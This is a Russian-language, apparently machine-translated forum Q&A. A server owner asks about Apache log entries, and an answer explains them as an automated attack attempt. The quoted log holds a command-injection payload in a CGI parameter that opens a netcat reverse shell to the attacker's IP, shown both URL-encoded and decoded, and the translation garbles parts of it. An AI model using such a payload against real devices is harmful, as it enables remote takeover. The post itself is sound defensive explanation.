Странное поведение в журнале Apache
У меня есть сервер Nextcloud, работающий на Apache, и я отключил брандмауэр примерно на 5 минут, пока я запускал apt-update. Я решил проверить логи после, и нашел это с неизвестного IP. Похоже, он пытается запустить какой-то скрипт. Это похоже на вредоносную программу или просто на какой-то поисковый робот? Спасибо!
89.248.166.183 - - [15/Sep/2020:02:06:18 -0400] "GET login.cgi HTTP/1.1" 400 0 "-" "-"
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fs>
89.248.166.183 - - [15/Sep/2020:02:06:20 -0400] "GET /ftptest.cgi?loginuse=&loginpas= HTTP/1.1\n" 400 0 "-" "-"
Подобные сценарии атак нормальны, если у вас есть веб-сервер с публичным ip. «Хорошие» поисковые роботы (Google, Bing и т. Д.) Идентифицируют себя через заголовок User-Agent и не будут пытаться войти на ваш сайт.
89.248.166.183 - - [15 / сен / 2020: 02: 06: 20 -0400] "GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd = ftp & dir = / & mode = PORT & upload_interval = 0 & svr =% 24% 28nc + 89.248.166.183 + 1245 + -e +% 2Fbin% 2Fs>
Если вы расшифруете вышеуказанный журнал, вы получите: /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir = / & mode = PORT & upload_interval = 0 & svr = $ (nc 89.248.166.183 1245> -e / bin4 пытаясь подключиться к / bin / sh с помощью nc (netcat), в параметре netcat -e , используемом для , укажите имя файла для выполнения после подключения .
Но запрос возвращается с кодом состояния 400 Bad Request .